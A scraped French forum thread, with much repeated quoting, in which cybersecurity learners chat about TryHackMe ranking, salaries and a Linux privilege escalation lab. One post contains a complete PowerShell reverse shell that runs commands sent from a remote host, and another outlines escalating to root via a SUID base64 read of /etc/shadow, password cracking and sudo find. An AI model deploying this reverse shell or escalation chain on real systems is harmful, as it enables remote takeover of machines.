Ce sujet a été résolu
Ah oui tu es bien monté ces derniers jours gg
Je suis dans les 10k il me semble, ça ralenti un peu, la room des escalations de privilège est bien longue
Je suis dans les 10k il me semble, ça ralenti un peu, la room des escalations de privilège est bien longue
il y a 3 mois
Peut être qu'il suffit d'être premier une fois ? Bizarre mais bien joué pour le badge en tout cas, j'ai du passé or je verrais demain je suis sur téléphone actuellement
il y a 3 mois
miko
3 mois
@Me0w J'ai fais paniquer mon Windows en prenant des notes ayaa, j'ai noté un reverse-shell pour powershell dans Obsidian (app pour prendre des notes), dès le moment ou j'ai collé le reverse shell, mon Windows la détecté comme un virus et à supprimé mon fichier de notes
Le reverse-shell en question :
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Le reverse-shell en question :
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Faut jamais prendre des notes sur windows pauvre folle
Je te le dis en connaissance de cause. Un jour j'ai mis des notes à moi dans une clef usb, je l'ai transféré dans mon windows et POUF. mon defender à tout supprimer. Toujours avoir un github de secour
FDV, Je donne des cours de cybersécurité gratuit tout les vendredi -> https://discord.gg/PXFh8QXkej
Je te le dis en connaissance de cause. Un jour j'ai mis des notes à moi dans une clef usb, je l'ai transféré dans mon windows et POUF. mon defender à tout supprimer. Toujours avoir un github de secour
il y a 3 mois
Tu peux utiliser un allias pour ton mail de boulot ou tu ne fais pas confiance ?
Mais n'hésitez pasà passer dans mon discord pour demander de l'aide, c'est 100% onchois
FDV, Je donne des cours de cybersécurité gratuit tout les vendredi -> https://discord.gg/PXFh8QXkej
il y a 3 mois
2 ans, c'est ma première entreprise. Oui quand tu as ton premier CDI tu comprends vite que la France c'est un demi pays tiers mondiste et qu'il faut vite partir
J'voulais dire salaire à l'année
Les juniors commencent autour des 75-80k en Suisse en moyenne
Les juniors commencent autour des 75-80k en Suisse en moyenne
il y a 3 mois
Faut jamais prendre des notes sur windows pauvre folle
Je te le dis en connaissance de cause. Un jour j'ai mis des notes à moi dans une clef usb, je l'ai transféré dans mon windows et POUF. mon defender à tout supprimer. Toujours avoir un github de secour
Je te le dis en connaissance de cause. Un jour j'ai mis des notes à moi dans une clef usb, je l'ai transféré dans mon windows et POUF. mon defender à tout supprimer. Toujours avoir un github de secour
Malheureusement c'est mon pc principal et j'ai que ça en attendant de passer sous Linux, j'ai pas trop envie de les save sur ma VM kali, je vais juste ajouter une exception au folder de obsidian pour que l'av ne scan plus le dossier.
Après j'ai pu récupérer en faisant restaurer la menace ça va
Après j'ai pu récupérer en faisant restaurer la menace ça va
il y a 3 mois
J'voulais dire salaire à l'année
Les juniors commencent autour des 75-80k en Suisse en moyenne
Les juniors commencent autour des 75-80k en Suisse en moyenne
Je suis à 45 K
ALED
FDV, Je donne des cours de cybersécurité gratuit tout les vendredi -> https://discord.gg/PXFh8QXkej
ALED
il y a 3 mois
La Fronce
Master ou oscp?
Master ou oscp?
Uniquement oscp avec bac +3
FDV, Je donne des cours de cybersécurité gratuit tout les vendredi -> https://discord.gg/PXFh8QXkej
il y a 3 mois
united-kv
3 mois
C’est en englais
Un visage sincère et plein d'empathie est le vrai visage de la " force"
il y a 3 mois
united-kv
3 mois
C’est en englais
Il faut comprendre l'anglais si tu veux faire un truc dans l'info, sinon c'est vraiment très très compliqué
il y a 3 mois
Il faut comprendre l'anglais si tu veux faire un truc dans l'info, sinon c'est vraiment très très compliqué
hello what's your name ?
Un visage sincère et plein d'empathie est le vrai visage de la " force"
il y a 3 mois
My name is Miko, what about you ?
My name is choah but everybody calls me xXx-B1GP5$$Y$L7Y9R_xXx
Un visage sincère et plein d'empathie est le vrai visage de la " force"
il y a 3 mois
Bon ça y est j'ai ENFIN terminé le module Linux Privilege Escalation (
https://tryhackme.com/room/linprivesc), très bon module mais assez compliqué au début mais il t'apprends beaucoup !
il y a 3 mois
miko
3 mois
Bon ça y est j'ai ENFIN terminé le module Linux Privilege Escalation (
https://tryhackme.com/room/linprivesc), très bon module mais assez compliqué au début mais il t'apprends beaucoup !
Félicitations clef
il y a 3 mois
Félicitations clef
Merci
Tu te souviens comment tu as fais le challenge à la fin ?
Je me demande s'il y a plusieurs solutions possible, perso j'ai utilisé base64 qui avait le SUID bit de set pour lire le fichier /etc/shadow et cracker le mot de passe du deuxième utilisateur, à partir de là sudo -l m'a indiqué que find pouvait être run en tant que sudo donc j'ai juste utiliser un gtfobins pour passer root
C'était sympathique !
Tu te souviens comment tu as fais le challenge à la fin ?
Je me demande s'il y a plusieurs solutions possible, perso j'ai utilisé base64 qui avait le SUID bit de set pour lire le fichier /etc/shadow et cracker le mot de passe du deuxième utilisateur, à partir de là sudo -l m'a indiqué que find pouvait être run en tant que sudo donc j'ai juste utiliser un gtfobins pour passer root
C'était sympathique !
il y a 3 mois
Merci
Tu te souviens comment tu as fais le challenge à la fin ?
Je me demande s'il y a plusieurs solutions possible, perso j'ai utilisé base64 qui avait le SUID bit de set pour lire le fichier /etc/shadow et cracker le mot de passe du deuxième utilisateur, à partir de là sudo -l m'a indiqué que find pouvait être run en tant que sudo donc j'ai juste utiliser un gtfobins pour passer root
C'était sympathique !
Tu te souviens comment tu as fais le challenge à la fin ?
Je me demande s'il y a plusieurs solutions possible, perso j'ai utilisé base64 qui avait le SUID bit de set pour lire le fichier /etc/shadow et cracker le mot de passe du deuxième utilisateur, à partir de là sudo -l m'a indiqué que find pouvait être run en tant que sudo donc j'ai juste utiliser un gtfobins pour passer root
C'était sympathique !
De mémoire j'ai utilisé la même technique.
J'ai gardé trace d'un fichier passwd et d'un shadow dans ma VM.
Donc j'ai sûrement utilisé john pour cracker le mot de passe.
Ce qui est pas forcément ultra réaliste parce dans un scénario réel faut compter sur la chance pour cracker un pass via dictionnaire (enfin j'imagine).
En fait peut-être pas, parce que c'est vrai que c'est l'étape intermédiaire, donc on peut admettre que ce soit un compte de test avec des identifiants créés à la va-vite par un admin pressé.
J'ai gardé trace d'un fichier passwd et d'un shadow dans ma VM.
Donc j'ai sûrement utilisé john pour cracker le mot de passe.
En fait peut-être pas, parce que c'est vrai que c'est l'étape intermédiaire, donc on peut admettre que ce soit un compte de test avec des identifiants créés à la va-vite par un admin pressé.
il y a 3 mois
@miko Oui, c'était exactement ça.
Alors, je sais pas s'il y a plusieurs façons d'escalader, mais en tout cas à mon avis, c'est pour nous montrer que l'escalade directe vers le compte root n'est pas toujours possible, et qu'il faut d'abord faire une escalade intermédiaire sur des comptes de même niveaux, et recommencer le processus avec ce nouveau compte.
Donc il y a des chances que ce soit la seule façon (justement pour nous forcer à retenir cette leçon la).
Alors, je sais pas s'il y a plusieurs façons d'escalader, mais en tout cas à mon avis, c'est pour nous montrer que l'escalade directe vers le compte root n'est pas toujours possible, et qu'il faut d'abord faire une escalade intermédiaire sur des comptes de même niveaux, et recommencer le processus avec ce nouveau compte.
Donc il y a des chances que ce soit la seule façon (justement pour nous forcer à retenir cette leçon la).
il y a 3 mois